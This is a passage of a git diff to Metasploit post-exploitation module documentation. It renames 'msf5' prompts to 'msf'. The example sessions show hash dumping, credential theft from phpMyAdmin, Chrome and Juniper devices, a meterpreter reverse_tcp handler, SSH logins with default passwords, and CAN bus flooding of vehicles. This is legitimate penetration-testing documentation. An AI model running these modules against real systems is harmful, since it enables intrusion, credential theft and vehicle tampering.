set session 4 session => 4 -msf5 post(android/manage/remove_lock_root) > run +msf post(android/manage/remove_lock_root) > run [!] SESSION may not be compatible with this module. [*] Removing /data/system/password.key diff --git a/documentation/modules/post/apple_ios/gather/ios_image_gather.md b/documentation/modules/post/apple_ios/gather/ios_image_gather.md index 1c200d81aa..1145b97008 100644 --- a/documentation/modules/post/apple_ios/gather/ios_image_gather.md +++ b/documentation/modules/post/apple_ios/gather/ios_image_gather.md @@ -17,10 +17,10 @@ ``` - msf5 > use post/apple_ios/gather/ios_image_gather - msf5 post(apple_ios/gather/ios_image_gather) > set session 1 + msf > use post/apple_ios/gather/ios_image_gather + msf post(apple_ios/gather/ios_image_gather) > set session 1 session => 1 - msf5 post(apple_ios/gather/ios_image_gather) > run + msf post(apple_ios/gather/ios_image_gather) > run [!] SESSION may not be compatible with this module. [+] Image path found. Will begin searching for images... diff --git a/documentation/modules/post/apple_ios/gather/ios_text_gather.md b/documentation/modules/post/apple_ios/gather/ios_text_gather.md index 02d361d3c9..1320ff146f 100644 --- a/documentation/modules/post/apple_ios/gather/ios_text_gather.md +++ b/documentation/modules/post/apple_ios/gather/ios_text_gather.md @@ -17,10 +17,10 @@ ``` - msf5 > use post/apple_ios/gather/ios_text_gather - msf5 post(apple_ios/gather/ios_text_gather) > set session 1 + msf > use post/apple_ios/gather/ios_text_gather + msf post(apple_ios/gather/ios_text_gather) > set session 1 session => 1 - msf5 post(apple_ios/gather/ios_text_gather) > run + msf post(apple_ios/gather/ios_text_gather) > run [!] SESSION may not be compatible with this module. [+] sms.db file found diff --git a/documentation/modules/post/bsd/gather/hashdump.md b/documentation/modules/post/bsd/gather/hashdump.md index 336d21666d..89d7efac2c 100644 --- a/documentation/modules/post/bsd/gather/hashdump.md +++ b/documentation/modules/post/bsd/gather/hashdump.md @@ -20,12 +20,12 @@ ### FreeBSD 11.1-RELEASE-i386 ``` - msf5 > use post/bsd/gather/hashdump - msf5 post(bsd/gather/hashdump) > set session 1 + msf > use post/bsd/gather/hashdump + msf post(bsd/gather/hashdump) > set session 1 session => 1 - msf5 post(bsd/gather/hashdump) > set verbose true + msf post(bsd/gather/hashdump) > set verbose true verbose => true - msf5 post(bsd/gather/hashdump) > run + msf post(bsd/gather/hashdump) > run [!] SESSION may not be compatible with this module. [+] passwd saved in: /root/.msf4/loot/20191027022955_default_172.16.191.175_passwd_886442.txt @@ -34,7 +34,7 @@ [+] user:$6$0De1rFoA/9y9ZNs/$0w33L7Iox0MGMleEF0mndGGxQ.xKAtWzEo5pzLrN35EonLTnb.NWuHVVbpUQS4aSY0pB2gfi9UXj5zUw2Y7Ds0:1001:1001:user:/home/user:/bin/sh [+] Unshadowed Password File: /root/.msf4/loot/20191027022956_default_172.16.191.175_bsd.hashes_729820.txt [*] Post module execution completed - msf5 post(bsd/gather/hashdump) > creds + msf post(bsd/gather/hashdump) > creds Credentials =========== @@ -43,7 +43,7 @@ 172.16.191.175 root $6$qHMkv01VUXi9UCIK$ReQbxn2vo/i/nnHHtdw3U8BS0IpPRjJmFS6mYPPAkrqP5bHn1m2ReWiRpfEpHbEtAik6rHGpwdF7jaVZwiq22/ Nonreplayable hash sha512,crypt 172.16.191.175 user $6$0De1rFoA/9y9ZNs/$0w33L7Iox0MGMleEF0mndGGxQ.xKAtWzEo5pzLrN35EonLTnb.NWuHVVbpUQS4aSY0pB2gfi9UXj5zUw2Y7Ds0 Nonreplayable hash sha512,crypt - msf5 post(bsd/gather/hashdump) > + msf post(bsd/gather/hashdump) > ``` ### Crack Hashes (John the Ripper) diff --git a/documentation/modules/post/hardware/automotive/can_flood.md b/documentation/modules/post/hardware/automotive/can_flood.md index 255e98d238..134f49c3cc 100644 --- a/documentation/modules/post/hardware/automotive/can_flood.md +++ b/documentation/modules/post/hardware/automotive/can_flood.md @@ -45,17 +45,17 @@ The user must know a list of frames that generate an effect on the car. This is You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output: ``` -msf5 > use auxiliary/server/local_hwbridge -msf5 auxiliary(server/local_hwbridge) > run +msf > use auxiliary/server/local_hwbridge +msf auxiliary(server/local_hwbridge) > run [*] Auxiliary module running as background job 0. [*] Using URL: http://0.0.0.0:8080/trycanbus [*] Local IP: http://10.0.2.15:8080/trycanbus [*] Server started. -msf5 auxiliary(server/local_hwbridge) > use auxiliary/client/hwbridge/connect -msf5 auxiliary(client/hwbridge/connect) > set targeturi trycanbus +msf auxiliary(server/local_hwbridge) > use auxiliary/client/hwbridge/connect +msf auxiliary(client/hwbridge/connect) > set targeturi trycanbus targeturi => trycanbus -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Attempting to connect to 127.0.0.1... [*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 03:17:55 -0400 @@ -65,12 +65,12 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > use post/hardware/automotive/can_flood -msf5 post(hardware/automotive/can_flood) > set canbus vcan0 +msf auxiliary(client/hwbridge/connect) > use post/hardware/automotive/can_flood +msf post(hardware/automotive/can_flood) > set canbus vcan0 canbus => vcan0 -msf5 post(hardware/automotive/can_flood) > set session 1 +msf post(hardware/automotive/can_flood) > set session 1 session => 1 -msf5 post(hardware/automotive/can_flood) > run +msf post(hardware/automotive/can_flood) > run [*] -- FLOODING -- [*] Post module execution completed diff --git a/documentation/modules/post/hardware/automotive/diagnostic_state.md b/documentation/modules/post/hardware/automotive/diagnostic_state.md index a98638cc2a..4980353700 100644 --- a/documentation/modules/post/hardware/automotive/diagnostic_state.md +++ b/documentation/modules/post/hardware/automotive/diagnostic_state.md @@ -36,7 +36,7 @@ Module options (post/hardware/automotive/diagnostic_state): You can test this module doing a candump and you should receive a response for each can frame in a loop at 0x7E8 when running UDS Simulator. ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -47,7 +47,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== @@ -56,7 +56,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 1 +msf auxiliary(client/hwbridge/connect) > sessions -i 1 [*] Starting interaction with 1... hwbridge > run post/hardware/automotive/diagnostic_state canbus=vcan0 diff --git a/documentation/modules/post/hardware/automotive/ecu_hard_reset.md b/documentation/modules/post/hardware/automotive/ecu_hard_reset.md index 70b52764b7..56fbea65fc 100644 --- a/documentation/modules/post/hardware/automotive/ecu_hard_reset.md +++ b/documentation/modules/post/hardware/automotive/ecu_hard_reset.md @@ -32,7 +32,7 @@ CAN Bus to perform scan on, defaults to connected bus Using UDS simulator for testing ECU hard reset: ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -43,7 +43,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== @@ -52,7 +52,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 1 +msf auxiliary(client/hwbridge/connect) > sessions -i 1 [*] Starting interaction with 1... hwbridge > run post/hardware/automotive/ecu_hard_reset CANBUS=vcan0 diff --git a/documentation/modules/post/hardware/automotive/mazda_ic_mover.md b/documentation/modules/post/hardware/automotive/mazda_ic_mover.md index 962360be60..46fc7e36f6 100644 --- a/documentation/modules/post/hardware/automotive/mazda_ic_mover.md +++ b/documentation/modules/post/hardware/automotive/mazda_ic_mover.md @@ -33,7 +33,7 @@ CAN Bus to perform scan on, defaults to connected bus A successful spoofing of an instrument cluster on a target vehicle: ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -44,7 +44,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== @@ -53,7 +53,7 @@ Active sessions -- ---- ---- ----------- ---------- 2 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 2 +msf auxiliary(client/hwbridge/connect) > sessions -i 2 [*] Starting interaction with 2... hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0 diff --git a/documentation/modules/post/linux/gather/enum_containers.md b/documentation/modules/post/linux/gather/enum_containers.md index 6ff61891de..6cecffe937 100644 --- a/documentation/modules/post/linux/gather/enum_containers.md +++ b/documentation/modules/post/linux/gather/enum_containers.md @@ -29,9 +29,9 @@ This module looks for container platforms running on the target and then lists a Scenario 1: Docker is installed with 4 running containers ``` -msf5 post(linux/gather/enum_containers) > set session 4 +msf post(linux/gather/enum_containers) > set session 4 session => 4 -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total @@ -47,9 +47,9 @@ cfa40ec4d85c nginx "/docker-entrypoint.…" 2 days ago Scenario 2: Docker, LXC and RKT are installed, and each of them are running their own containers ``` -msf5 post(linux/gather/enum_containers) > set session 2 +msf post(linux/gather/enum_containers) > set session 2 session => 2 -msf5 post(linux/gather/enum_containers) > exploit +msf post(linux/gather/enum_containers) > exploit [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total @@ -75,24 +75,24 @@ UUID APP IMAGE NAME STATE CREATED [+] Results stored in: /home/gwillcox/.msf4/loot/20200805193842_default_172.27.129.4_host.rkt_contain_801968.txt [*] Post module execution completed -msf5 post(linux/gather/enum_containers) > +msf post(linux/gather/enum_containers) > Scenario 3: No container software is runnable ``` -msf5 post(linux/gather/enum_containers) > set session 6 +msf post(linux/gather/enum_containers) > set session 6 session => 6 -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [-] No container software appears to be installed or runnable by the current user [*] Post module execution completed ``` Scenario 4: List all containers and execute the `env` command on all running containers ``` -msf5 post(linux/gather/enum_containers) > set session 6 +msf post(linux/gather/enum_containers) > set session 6 session => 6 -msf5 post(linux/gather/enum_containers) > set CMD "env" +msf post(linux/gather/enum_containers) > set CMD "env" CMD => env -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total @@ -147,5 +147,5 @@ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/us LANG=C PWD=/home/gwillcox/git/metasploit-framework [*] Post module execution completed -msf5 post(linux/gather/enum_containers) > -``` \ No newline at end of file +msf post(linux/gather/enum_containers) > +``` diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md index ae077120c7..a950d2d1ed 100644 --- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md +++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md @@ -15,12 +15,12 @@ This post module gathers PhpMyAdmin Creds from target Linux machine. ## Scenarios ``` -msf5 > use multi/handler -msf5 exploit(multi/handler) > set lhost 192.168.37.1 +msf > use multi/handler +msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (816260 bytes) to 192.168.37.226 @@ -28,10 +28,10 @@ msf5 exploit(multi/handler) > run meterpreter > background [*] Backgrounding session 2... -msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal -msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2 +msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal +msf post(linux/gather/phpmyadmin_credsteal) > set session 2 session => 2 -msf5 post(linux/gather/phpmyadmin_credsteal) > run +msf post(linux/gather/phpmyadmin_credsteal) > run PhpMyAdmin Creds Stealer! @@ -43,6 +43,6 @@ PhpMyAdmin Creds Stealer! [*] Storing credentials... [+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt [*] Post module execution completed -msf5 post(linux/gather/phpmyadmin_credsteal) > +msf post(linux/gather/phpmyadmin_credsteal) > ``` diff --git a/documentation/modules/post/multi/gather/chrome_cookies.md b/documentation/modules/post/multi/gather/chrome_cookies.md index b64542af1e..eff7469d00 100644 --- a/documentation/modules/post/multi/gather/chrome_cookies.md +++ b/documentation/modules/post/multi/gather/chrome_cookies.md @@ -77,7 +77,7 @@ msf post(multi/gather/chrome_cookies) > run [*] Removing file \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html [*] Removing file \Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log [*] Post module execution completed -msf5 post(multi/gather/chrome_cookies) > +msf post(multi/gather/chrome_cookies) > ``` diff --git a/documentation/modules/post/multi/gather/enum_hexchat.md b/documentation/modules/post/multi/gather/enum_hexchat.md index 22de32e897..6b97f36c9b 100644 --- a/documentation/modules/post/multi/gather/enum_hexchat.md +++ b/documentation/modules/post/multi/gather/enum_hexchat.md @@ -128,7 +128,7 @@ Gather the files from XCHat. Default `false`. xchat => true resource (xchat_win.rb)> set verbose true verbose => true - msf5 post(multi/gather/enum_hexchat) > rexploit + msf post(multi/gather/enum_hexchat) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/post/multi/gather/grub_creds.md b/documentation/modules/post/multi/gather/grub_creds.md index d3eeea214b..f63fe7b757 100644 --- a/documentation/modules/post/multi/gather/grub_creds.md +++ b/documentation/modules/post/multi/gather/grub_creds.md @@ -59,8 +59,8 @@ action. Typical run against Ubuntu 18.04 LTS ``` -msf5 exploit(handler) > use post/multi/gather/grub_creds -msf5 post(grub_creds) > set SESSION 1 +msf exploit(handler) > use post/multi/gather/grub_creds +msf post(grub_creds) > set SESSION 1 SESSION => 1 msf post(grub_creds) > run diff --git a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md index 945a9d6d60..0df12e0a87 100644 --- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md +++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md @@ -88,7 +88,7 @@ resource (unifi.rb)> run #### Details ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid @@ -101,7 +101,7 @@ BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > background [*] Backgrounding session 2... -msf5 post(multi/gather/ubiquiti_unifi_backup) > loot +msf post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== @@ -164,7 +164,7 @@ resource (unifi.rb)> run #### Details ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid @@ -179,7 +179,7 @@ Logged On Users : 1 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 3... -msf5 post(multi/gather/ubiquiti_unifi_backup) > loot +msf post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== @@ -197,7 +197,7 @@ host service type name #### Module ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > rexploit +msf post(multi/gather/ubiquiti_unifi_backup) > rexploit [*] Reloading module... [+] Read UniFi Controller file /Users/unifi/Library/Application Support/Unifi/data/system.properties @@ -214,7 +214,7 @@ An example of the output when not utilizing meterpreter (just a shell) to access work successfully. ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions +msf post(multi/gather/ubiquiti_unifi_backup) > sessions Active sessions =============== @@ -224,9 +224,9 @@ Active sessions 1 shell linux SSH unifi:unifi (1.1.1.1:22) 2.2.2.2:35125 -> 1.1.1.1:22 (1.1.1.1) 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 1.1.1.1 2.2.2.2:4433 -> 1.1.1.1:52584 (1.1.1.1) -msf5 post(multi/gather/ubiquiti_unifi_backup) > session -i 1 +msf post(multi/gather/ubiquiti_unifi_backup) > session -i 1 l[-] Unknown command: session. -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1 [*] Starting interaction with 1... ls -lah /var/lib/unifi/backup/*.unf @@ -235,9 +235,9 @@ ls -lah /var/lib/unifi/backup/*.unf -rw-r----- 1 unifi unifi 3.3M May 10 14:26 /var/lib/unifi/backup/5.10.23.unf ^Z Background session 1? [y/N] y -msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1 +msf post(multi/gather/ubiquiti_unifi_backup) > set session 1 session => 1 -msf5 post(multi/gather/ubiquiti_unifi_backup) > run +msf post(multi/gather/ubiquiti_unifi_backup) > run [!] SESSION may not be compatible with this module. [+] Read UniFi Controller file /var/lib/unifi/system.properties diff --git a/documentation/modules/post/multi/recon/sudo_commands.md b/documentation/modules/post/multi/recon/sudo_commands.md index 5bf4399aca..d36f1f23ea 100644 --- a/documentation/modules/post/multi/recon/sudo_commands.md +++ b/documentation/modules/post/multi/recon/sudo_commands.md @@ -40,12 +40,12 @@ ## Scenarios ``` - msf5 > use post/multi/recon/sudo_commands - msf5 post(multi/recon/sudo_commands) > set session 1 + msf > use post/multi/recon/sudo_commands + msf post(multi/recon/sudo_commands) > set session 1 session => 1 - msf5 post(multi/recon/sudo_commands) > set verbose true + msf post(multi/recon/sudo_commands) > set verbose true verbose => true - msf5 post(multi/recon/sudo_commands) > run + msf post(multi/recon/sudo_commands) > run [*] Executing: /usr/bin/sudo -n -l Matching Defaults entries for wvu on localhost: @@ -78,7 +78,7 @@ [+] Output stored in: /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt [*] Post module execution completed - msf5 post(multi/recon/sudo_commands) > cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt + msf post(multi/recon/sudo_commands) > cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt [*] exec: cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt Command,RunAsUsers,RunAsGroups,Password?,Privesc? @@ -87,6 +87,6 @@ "/sbin/umount /mnt/cdrom","root","","True","" "ALL","ALL","","True","True" "ALL","ALL","","","True" - msf5 post(multi/recon/sudo_commands) > + msf post(multi/recon/sudo_commands) > ``` diff --git a/documentation/modules/post/networking/gather/enum_brocade.md b/documentation/modules/post/networking/gather/enum_brocade.md index 103c8945cb..c0bf7d1387 100644 --- a/documentation/modules/post/networking/gather/enum_brocade.md +++ b/documentation/modules/post/networking/gather/enum_brocade.md @@ -74,7 +74,7 @@ resource (brocade.rb)> run [+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro [+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw [*] Post module execution completed -msf5 post(networking/gather/enum_brocade) > loot +msf post(networking/gather/enum_brocade) > loot Loot ==== @@ -84,7 +84,7 @@ host service type name content info 10.0.4.51 brocade.version version.txt text/plain Brocade Version /root/.msf4/loot/20190601221959_default_10.0.4.51_brocade.version_003751.txt 10.0.4.51 brocade.config config.txt text/plain Brocade Configuration /root/.msf4/loot/20190601222004_default_10.0.4.51_brocade.config_998514.txt -msf5 post(networking/gather/enum_brocade) > creds +msf post(networking/gather/enum_brocade) > creds Credentials =========== diff --git a/documentation/modules/post/networking/gather/enum_cisco.md b/documentation/modules/post/networking/gather/enum_cisco.md index cb743b7946..1a3d0c7c1c 100644 --- a/documentation/modules/post/networking/gather/enum_cisco.md +++ b/documentation/modules/post/networking/gather/enum_cisco.md @@ -84,7 +84,7 @@ resource (cisco.rb)> run [+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt [*] Post module execution completed [*] Starting persistent handler(s)... -msf5 post(networking/gather/enum_cisco) > creds +msf post(networking/gather/enum_cisco) > creds Credentials =========== @@ -153,7 +153,7 @@ resource (cisco.rb)> run [+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt [*] Post module execution completed [*] Starting persistent handler(s)... -msf5 post(networking/gather/enum_cisco) > creds +msf post(networking/gather/enum_cisco) > creds Credentials =========== diff --git a/documentation/modules/post/networking/gather/enum_juniper.md b/documentation/modules/post/networking/gather/enum_juniper.md index c13f9a3aad..a7f4552b25 100644 --- a/documentation/modules/post/networking/gather/enum_juniper.md +++ b/documentation/modules/post/networking/gather/enum_juniper.md @@ -41,14 +41,14 @@ This module will look for the following parameters which contain credentials: #### root Login (SSH Shell) ``` -msf5 > auxiliary/scanner/ssh/ssh_login -msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 +msf > auxiliary/scanner/ssh/ssh_login +msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 rhosts => 192.168.1.5 -msf5 auxiliary(scanner/ssh/ssh_login) > set username root +msf auxiliary(scanner/ssh/ssh_login) > set username root username => root -msf5 auxiliary(scanner/ssh/ssh_login) > set password Juniper +msf auxiliary(scanner/ssh/ssh_login) > set password Juniper password => Juniper -msf5 auxiliary(scanner/ssh/ssh_login) > run +msf auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.5:22 - Success: 'root:Juniper' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]' [*] Command shell session 1 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2020-07-14 20:48:58 -0400 @@ -57,10 +57,10 @@ msf5 auxiliary(scanner/ssh/ssh_login) > run ``` ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use post/networking/gather/enum_juniper -msf5 post(networking/gather/enum_juniper) > set session 1 +msf auxiliary(scanner/ssh/ssh_login) > use post/networking/gather/enum_juniper +msf post(networking/gather/enum_juniper) > set session 1 session => 1 -msf5 post(networking/gather/enum_juniper) > run +msf post(networking/gather/enum_juniper) > run [*] In an SSH shell [*] Getting version information [*] Original OS Guess junos, is now JunOS 12.3R7.7 @@ -81,7 +81,7 @@ msf5 post(networking/gather/enum_juniper) > run [+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV [+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP [*] Post module execution completed -msf5 post(networking/gather/enum_juniper) > creds +msf post(networking/gather/enum_juniper) > creds Credentials =========== @@ -105,14 +105,14 @@ host origin service public private #### cli Login ``` -msf5 > auxiliary/scanner/ssh/ssh_login -msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 +msf > auxiliary/scanner/ssh/ssh_login +msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 rhosts => 192.168.1.5 -msf5 auxiliary(scanner/ssh/ssh_login) > set username newuser +msf auxiliary(scanner/ssh/ssh_login) > set username newuser username => newuser -msf5 auxiliary(scanner/ssh/ssh_login) > set password Newuser +msf auxiliary(scanner/ssh/ssh_login) > set password Newuser password => Newuser -msf5 auxiliary(scanner/ssh/ssh_login) > run +msf auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.5:22 - Success: 'newuser:Newuser' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]' [*] Command shell session 2 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2018-02-19 21:32:20 -0500 diff --git a/documentation/modules/post/osx/admin/say.md b/documentation/modules/post/osx/admin/say.md index 7331fa08db..2fe314f76c 100644 --- a/documentation/modules/post/osx/admin/say.md +++ b/documentation/modules/post/osx/admin/say.md @@ -77,9 +77,9 @@ Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas. ### User level shell on OSX 10.14.4 ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say -msf5 post(osx/admin/say) > set session 1 +msf auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say +msf post(osx/admin/say) > set session 1 session => 1 -msf5 post(osx/admin/say) > run +msf post(osx/admin/say) > run [*] Post module execution completed ``` diff --git a/documentation/modules/post/osx/capture/screen.md b/documentation/modules/post/osx/capture/screen.md index 403ac69dde..38b18da730 100644 --- a/documentation/modules/post/osx/capture/screen.md +++ b/documentation/modules/post/osx/capture/screen.md @@ -33,16 +33,16 @@ This module takes screenshots of target desktop and automatically downloads them ### User level shell on OSX 10.14.4 ``` -msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen -msf5 post(osx/capture/screen) > set session 1 +msf post(osx/capture/keylog_recorder) > use post/osx/capture/screen +msf post(osx/capture/screen) > set session 1 session => 1 -msf5 post(osx/capture/screen) > run +msf post(osx/capture/screen) > run [*] Capturing 1 screenshots with a delay of 10 seconds [*] Screen Capturing Complete [*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot [*] Post module execution completed -msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot +msf post(osx/capture/screen) > loot -t screen_capture.screenshot Loot ==== diff --git a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md index bab610f1c7..786de20a80 100644 --- a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md +++ b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md @@ -29,13 +29,13 @@ This module uses a vulnerability in macOS High Sierra's `log` command. It uses t Typical run against an OSX session, after creating a new APFS disk using Disk Utility: ``` -msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1 +msf exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd +msf post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1 SESSION => -1 -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit +msf post(osx/gather/apfs_encrypted_volume_passwd) > exploit [+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 . [+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 . [*] Post module execution completed -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > +msf post(osx/gather/apfs_encrypted_volume_passwd) > ``` diff --git a/documentation/modules/post/osx/gather/enum_osx.md b/documentation/modules/post/osx/gather/enum_osx.md index 5010f45d32..bb05fa27c2 100644 --- a/documentation/modules/post/osx/gather/enum_osx.md +++ b/documentation/modules/post/osx/gather/enum_osx.md @@ -42,8 +42,8 @@ The following information is enumerated: ### User level shell on OSX 10.14.4 ``` -msf5 > use post/osx/gather/enum_osx -msf5 post(osx/gather/enum_osx) > show options +msf > use post/osx/gather/enum_osx +msf post(osx/gather/enum_osx) > show options Module options (post/osx/gather/enum_osx): @@ -51,9 +51,9 @@ Module options (post/osx/gather/enum_osx): ---- --------------- -------- ----------- SESSION yes The session to run this module on. -msf5 post(osx/gather/enum_osx) > set session 1 +msf post(osx/gather/enum_osx) > set session 1 session => 1 -msf5 post(osx/gather/enum_osx) > run +msf post(osx/gather/enum_osx) > run [*] Running module against MacBook-Pro.nogroup [*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 @@ -85,7 +85,7 @@ msf5 post(osx/gather/enum_osx) > run [*] Downloading .bash_history [*] Enumerating and Downloading keychains for h00die [*] Post module execution completed -msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 +msf post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 [*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 total 1.4M diff --git a/documentation/modules/post/osx/gather/hashdump.md b/documentation/modules/post/osx/gather/hashdump.md index 79ad868829..13529496e9 100644 --- a/documentation/modules/post/osx/gather/hashdump.md +++ b/documentation/modules/post/osx/gather/hashdump.md @@ -21,7 +21,7 @@ This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10 ### User level shell on OSX 10.14.4 ``` -msf5 post(osx/gather/hashdump) > run +msf post(osx/gather/hashdump) > run [-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes [*] Post module execution completed @@ -30,7 +30,7 @@ msf5 post(osx/gather/hashdump) > run ### Root level shell on 